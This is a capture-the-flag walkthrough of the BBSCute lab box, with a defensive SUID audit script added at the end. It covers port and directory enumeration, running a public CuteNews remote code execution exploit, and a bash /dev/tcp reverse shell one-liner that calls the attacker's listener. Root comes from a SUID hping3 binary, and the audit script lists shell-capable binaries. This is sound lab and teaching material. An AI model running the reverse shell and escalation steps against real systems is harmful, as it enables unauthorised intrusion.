PG — BBSCute— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article walks you through the BBSCute box, created by foxlox and hosted on Offensive Security's Proving Grounds Labs. Anyone with access to Vulnhub or Offensive Security's Proving Grounds Play or Practice can try to pwn this Linux box; it is an easy and fun boot2root machine. Hope you enjoy reading the walkthrough!
As we are already provided with the IP address of the box, we will scan it with Nmap.
We scan the IP for the 1000 default ports by typing the following command in our terminal.
After a short while, we have got our results as shown below:
To gather further information on the ports found by nmap, we add a few more arguments and specify the open ports. -sV probes for the service and version running on each open port, and -sC runs the default NSE scripts against those services to collect extra information that may reveal a vulnerability.
nmap -p 22,80,88,110,995 192.168.x.x -sV -sC
In a short while we have our results and more details on the open ports. We decide to start enumeration on port 80, where a default Apache web server is running: port 22 is not a logical starting point because SSH does not offer the broad attack surface that an HTTP server does. Port 88 hosts an nginx web server, which is an HTTP server as well, but it returns a 404 Not Found error when we connect and reveals nothing of interest. Ports 110 and 995 also give us no useful path to follow.
We open our browser and type the IP address of the box.
Now we use gobuster to brute-force directories and see if there is something useful. The -u argument specifies the URL and -w provides the wordlist for directory brute-forcing. To avoid creating noise on the server, and to avoid being blocked by a firewall if there is one, we limit the threads to 5 with the -t argument.
gobuster dir -u http://192.168.x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster reveals several entries, but the only useful one is index.php, which uncovers a login page.
After trying to log in with common credentials such as admin:admin, we are unable to log in. Then we notice that under the login section of the page, the name and version number of the CMS are visible, which we will investigate further.
So we run searchsploit with the name and version number in our terminal to see if there is a public exploit.
There are four different public exploits. We will not use Metasploit, so as to keep our skills sharp, and instead check the python script, 48800.py, as it gives us Remote Code Execution (RCE) on the server.
Before using it, we need to change several lines of the exploit code to make it work against our web server. The first line that needs to be altered is shown below:
As we do not have a directory called /CuteNews on our web server, we remove it from this line and from the following ones; otherwise our python script will not work!
We are now ready to exploit the web server with the python script we edited.
We execute our python script to connect to the web server:
The exploit asks for the URL of the web server we want to exploit, and we provide it. After typing the URL we hit enter, and we get command execution on the web server.
To get a netcat shell, we set up a netcat listener in our terminal on port 443, a port that is usually trusted by firewalls and therefore often works for a reverse shell.
Then, we type the following command to execute on the server for a reverse shell.
echo 'bash -i >& /dev/tcp/192.168.x.x/443 0>&1' | bash
And, we have got a netcat shell on the web server.
Now we can look for the local.txt flag with the following command and cat it.
find / -name local.txt 2>/dev/null
Privilege escalation on this box was easy. There are some standard enumeration steps to try after getting a low-privileged shell, and the first one, checking the sudo permissions of the current user by typing sudo -l in the terminal, already gives us our path to privilege escalation.
We see that we can execute hping3 with sudo permissions.
To execute /bin/sh -i properly, we first get a TTY shell with the following command.
python3 -c "__import__('pty').spawn('/bin/bash')"
Now we are able to run hping3, but if we run it with sudo as the sudo -l output suggests, it asks for a password. Since we also see that hping3 has the SUID bit set, we check GTFOBins and find that we can execute commands as root from the hping3 interactive prompt.
We get the hping3 prompt by simply typing hping3, and then we escalate our privileges as shown below.
As we can see, we are able to execute commands as root since our effective user ID (euid) is root. So let us cat the root flag.
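From the defender's side, the weakness used here (a SUID-root hping3, a binary GTFOBins documents as able to spawn a shell) is easy to audit for. The following POSIX sh helper is an added example and not part of the original walkthrough; the RISKY list and the SAMPLE paths are constructed assumptions, not output from the box.

```shell
#!/bin/sh
# Added audit helper (not from the walkthrough): list SUID-root binaries and
# flag those that can spawn a shell when run with elevated privileges.
# Assumptions: POSIX sh with find(1) and basename(1); RISKY is an
# illustrative subset of the GTFOBins SUID list, not the full list.

RISKY="hping3 bash sh vim find python python3 perl nmap less more awk env"

# is_risky NAME -> exit 0 if NAME is in the RISKY list, 1 otherwise
is_risky() {
    for r in $RISKY; do
        [ "$1" = "$r" ] && return 0
    done
    return 1
}

# flag_risky: reads one path per line on stdin, prints those whose
# basename is in the RISKY list
flag_risky() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if is_risky "$(basename "$p")"; then
            printf '%s\n' "$p"
        fi
    done
}

# find_suid_root ROOT -> every regular file under ROOT owned by root
# with the SUID bit set (the same class of file that made hping3 exploitable)
find_suid_root() {
    find "$1" -xdev -type f -user root -perm -4000 2>/dev/null
}

# audit_suid ROOT -> risky SUID-root binaries under ROOT; no output means none
audit_suid() {
    find_suid_root "$1" | flag_risky
}

# Constructed sample standing in for find_suid_root output on a box like this one
SAMPLE='/usr/sbin/hping3
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find'

# count_risky -> number of risky entries in SAMPLE (hping3 and find)
count_risky() {
    printf '%s\n' "$SAMPLE" | flag_risky | wc -l | tr -d ' '
}
```

Run `audit_suid /` as root on a live system; passwd and sudo are expected SUID binaries, while anything printed deserves a chmod u-s or a review of why it needs the bit.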
Now we have full authority on the box. Enjoy!